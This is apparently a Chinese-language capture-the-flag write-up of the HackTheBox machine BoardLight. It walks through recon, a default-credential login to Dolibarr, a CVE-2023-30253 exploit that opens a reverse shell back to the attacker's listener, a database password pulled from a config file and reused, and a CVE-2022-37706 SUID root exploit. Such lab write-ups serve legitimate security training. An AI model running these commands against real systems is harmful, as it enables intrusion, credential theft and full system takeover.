HackTheBox-Machines BoardLight Writeup

kazma 成大資安社 創辦人/社長

Exploitation

一樣先做基本的掃描:

1
2
3
4
5
6
7
8
9
10
11
12
└──╼ [★]$ nmap -sV 10.10.11.11
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 06:53 CDT
Nmap scan report for 10.10.11.11
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds

看起來有網頁服務跟 ssh,用 whatweb 可以看網頁資訊:

1
2
└──╼ [★]$ whatweb 10.10.11.11
http://10.10.11.11 [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[[email protected]], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.11], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]

順便加到 /etc/hosts

1
2
└──╼ [★]$ echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts
10.10.11.11 board.htb

接著可以掃 subdomain:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└──╼ [★]$ ffuf -u http://board.htb -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host:FUZZ.board.htb" -fw 6243 
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://board.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 6243
________________________________________________

crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 380ms]

可以看到有個 crm 的 subdomain,我們也把他加到 /etc/hosts

1
2
└──╼ [★]$ echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
10.10.11.11 crm.board.htb

用瀏覽器訪問 crm.board.htb 會看到一個登入頁面:
login
看到 title 是 Dolibarr,上網查一下這是什麼:

Dolibarr ERP CRM is an open source, free software package for companies of any size, foundations or freelancers. It includes different features for enterprise resource planning (ERP) and customer relationship management (CRM) but also other features for different activities.

總之就是一個開源給企業的 ERP + CRM。
我們同時搜尋一下他的 default password:

Login/password of Dolibarr ERP & CRM: - If you did not change it, login is admin and password is the same than the one sent by email for your dashboard access, once your instance was created. Take a look into your message box to retreive it. EMail topic should start with “Welcome to Dolicloud”.

結果就順利用 default password 滑進去了。
那同時也搜尋一下 Dolibarr 17.0.0 有沒有已知漏洞,結果當然是有的:
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
└──╼ [★]$ python exploit.py -h
usage: python3 exploit.py <TARGET_HOSTNAME> <USERNAME> <PASSWORD> <LHOST> <LPORT>
example: python3 exploit.py http://example.com login password 127.0.0.1 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
hostname Target hostname
username Username of Dolibarr ERP/CRM
password Password of Dolibarr ERP/CRM
lhost Listening host for reverse shell
lport Listening port for reverse shell

options:
-h, --help show this help message and exit
┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-jejtlehtvs]─[~/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└──╼ [★]$ python3 exploit.py http://crm.board.htb admin admin 10.10.14.22 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

Reverse shell:

1
2
3
4
5
6
└──╼ [★]$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.11] 44222
bash: cannot set terminal process group (893): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$

拿到 shell 後我們一樣先換 bash,然後我們上網搜尋一下 Dolibarr 的設定檔放在哪個位置:
conf
讚讚讚,我們來找找 conf/conf.php,裡面應該會有 db_pass:

1
2
3
4
5
6
www-data@boardlight:/$ find /var -name "conf.php" 2>/dev/null
find /var -name "conf.php" 2>/dev/null
/var/www/html/crm.board.htb/htdocs/conf/conf.php
www-data@boardlight:/$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php | grep db_pass
<l/crm.board.htb/htdocs/conf/conf.php | grep db_pass
$dolibarr_main_db_pass='serverfun2$2023!!';

拿到 user password 了,我們嘗試切換到 user:

1
2
3
4
5
6
7
8
9
10
www-data@boardlight:/$ su larissa
su larissa
Password: serverfun2$2023!!

larissa@boardlight:/$ cd ~
cd ~
larissa@boardlight:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt

順利登入!那我們直接用 ssh 登入 larissa 的帳號,同時我們檢查一下 SUID 可以發現 enlightenment 有給 SUID:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
└──╼ [★]$ ssh [email protected]
The authenticity of host '10.10.11.11 (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.11' (ED25519) to the list of known hosts.
[email protected]'s password:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

larissa@boardlight:~$ find / -perm /u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

那我們接著可以上網查詢相關的 exploit:
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
larissa@boardlight:~$ vi exploit.sh
larissa@boardlight:~$ chmod +x exploit.sh
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# find / -name "root.txt"
/root/root.txt

我們把 exploit 用 vi 寫進去,給上執行權限,執行後就可以順利一鍵提權!

Pwned !!!

pwn

  • Title: HackTheBox-Machines BoardLight Writeup
  • Author: kazma
  • Created at : 2024-08-11 11:36:19
  • Updated at : 2024-08-11 20:49:29
  • Link: https://kazma.tw/2024/08/11/HackTheBox-Machines-BoardLight-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
HackTheBox-Machines BoardLight Writeup